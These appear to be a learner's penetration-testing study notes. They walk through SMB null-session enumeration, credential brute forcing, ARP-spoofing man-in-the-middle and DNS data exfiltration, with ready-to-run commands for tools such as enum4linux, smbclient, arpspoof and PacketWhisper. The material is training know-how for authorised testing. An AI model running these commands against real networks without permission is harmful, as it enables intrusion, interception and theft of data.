📶Network Attacks

🔓Authentication Cracking

Brute Force mostly is never used hence why we focus on online Dictionary attacks.

One Helpful tool is Hydra:

🐲Hydra

hence why you need a really good set of password lists:

• SecLists

• wiki skullsecuity

👁‍🗨Windows Shares

NetBIOS can provide when querying a computer following info:

• Host name.

• NetBIOS name. (via UDP)

• Domain.

• Network Shares.

[pre WinXP] NetBIOS is a non-routable OSI Session Layer 5 Protocol and a service that allows applications on computers to communicate with one another over a local area network (LAN). - Today we have NBT (NetBIOS over TCP/IP) now we can route.

Structure of NetBIOS.

Review SMB vs NetBIOS/NBT here. Hint: SMB does rely on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP.

NetBIOS is completely independent from SMB. It is an API that SMB, and other technologies can use, so NetBIOS has no dependency to SMB.

test your own PC shares:

\\localhost\admin$

\\localhost\d$

type it in path input in the File explorer.

UNC paths

Admin shares

Null Sessions

Null session attack: exploit a vulnerability within Windows Administrative Share (which can't be deleted but can have auth.) this allows an attacker to connect to a local/remote share without authentication.

steps to attack:

1. Enumerate Windows Shares.

2. Check for Null Sessions.

3. Exploit Null Session.

1- To Enumerate we have the following tools:

• NBTStat (Win command tool display info about target).

To know if file sharing is Up and runing:

nbtstat -A <IP>

<20> means file sharing service is up/runing.

• NET VIEW:(Win enum) after knowing it's running time to enum the shares.

NET VIEW <IP>

• Nmblookup: (Linux Enum) provided by the Samba suite.

nmblookup -A <Target_ip>

we get the same result as NET VIEW

• Smbclient: (Linux Enum) also available with Samba Suite to Enum Shares and other things.

smbclient -L //<IP>  -N

-L: lookup, -N don't ask for password.

Notice SMBclient shows more results, Admin$ shares that were not shown by the other prev. tools.

2- Checking for Null Session:

We will exploit the IPC$ Administrative share by trying to connect without valid credentials.

NET USE \\<PI>\IPC$ '' /u:''

this tells Windowds to conn. to IPC$ with empty Username/Password. \\<IP>\IPC$ following the UNC path standard.

same thing with SMBclient:

smbclient //<IP>/IPC$ -N
smbclient //<IP>/C$ -N

3- Exploiting Null Sessions:

can be done also the same NET command but we will use Win/Linux tools to Automate.

• ENUM: (Win tool, must download it) enumerate Admin shares as well.

enum -S <IP> //enum shares
enum -U <IP> //enum users
enum -P <IP> //check password policy

Checking password policy before running Auth Attack lets you fine-tune tools to: - Prevent accounts locking. - prevents false positives. - choose your Dict/BruteForce config. (knowing min/max length of pass)

• Winfo: another Win tool to attack null sessions.

winfo <IP> -n

-n tell the tool to use null sessions.

Check for Null Sessions on Linux:

• Enum4linux: Linux PERL script that can do the prev. two tools + more.

enum4linux -U -o <IP>

get -U user list & -o OS info for IP target.

to carry all the 3 phases:

enum4linux -n <IP> //check for open shares with <20> flag

enum4linux -P <IP> //enum pass policy

enum4linux -S <IP> //what target machine is sharing(Dir,files..etc).
enum4linux -s /usr/share/enum4linux/share-list.txt <IP> //bruteforce to check shares

enum4linux -a <IP> //do all the prev. command at once+ extra info

• samrdump.py: comes with kali does the same thing. (gives extra info)

cd /Desktop/Tools_from_eJPT/Impacket/impacket-master/examples
python3 samrdump.py <IP>

• Nmap: can also do the same thing after knowing shares running.

nmap -script=smb-enum-shares <IP> //get shares
nmap -script=smb-enum-users <IP> //get users
nmap -script=smb-brute <IP> //brute force Username/pass

• smbclient : Access the share:

smbclient -L WORKGROUP -I <IP> -N -U "" //get list of shares

smbclient \\\\<IP>\\<share> -N //access a share

get <file> <location_in_your_PC>  //download a certian file while inside smb: \>

Great SMB Enumeration tutorial full of tools.

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/

💀ARP Poising

happen when: Attacker Send gratuitous ARP relies (ARP replies without actually asking) to the target thus changing the ARP cache for all victims so they forward the packet to the attacker. Then attacker can alter/forward the packet which means attacker now got Man-In-The-Middle Attack.

Dsniff: collection of tools for network auditing and Pen Testing. it includes arpspoof. install it:

sudo apt install dsniff

Before running must transfer, Linux box into a router by enabling Linux Kernal IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward //when zsh/bash: permission denied

Then you can run arpspoof:

arpspoof -i <interface> -t <server_IP> -r <host_IP>

-i: NIC to use eth0 or tap0..etc taget/host are victim IP (you want to be in middle of these two)

Then on the running Wireshark Analyze the traffic.

Metasploit

🔬Metasploit

DNS Exfiltration

Tools:

• PacketWhisper: Exif Data using text-based Steganography via DNS.

• EgressCheck Framework: check for the open outbound port.

Egress filtering (aka outbound filtering): controls the traffic that is attempting to leave the network. Before an outbound connection is allowed, it has to pass the filter's rules (i.e. policies).

PacketWhisper:

to use the tool:

1. you have to run it inside the Target machine providing the file you would like to stealthy steal/exif. (this generates DNS queries).

2. In your machine capture the DNS queries with Wireshark/tcpdump (better)

3. run the tool in your machine this time againts the captured pcap file to get the stolen file.

EgressCheck:

To use:

1. run the tool in your machine with appropriate commands and generate the command for the target shell [ex: powershell-cmd] it will give you a file to run on the target [ex: .batch for windows].

2. capture traffic:

   tcpdump -n -u -w -i any /tmp/file.pcap

3. Run the generated file in the target machine. (or use the outputted command).

4. when egress is done close tcpdump and run:

   tshark -r /tmp/file.pcap -eip.proto -eip.src -etcp.dstport tcp > /tmp/egress.tcp

   print results:

   cat /tmp/egress.tcp | awk '{ print $3 }' | xargs echo | sed 's/ /,/g'
   cat /tmp/egress.tcp | awk '{ print $2,":",$3 }' | sed 's/ //g'
   

`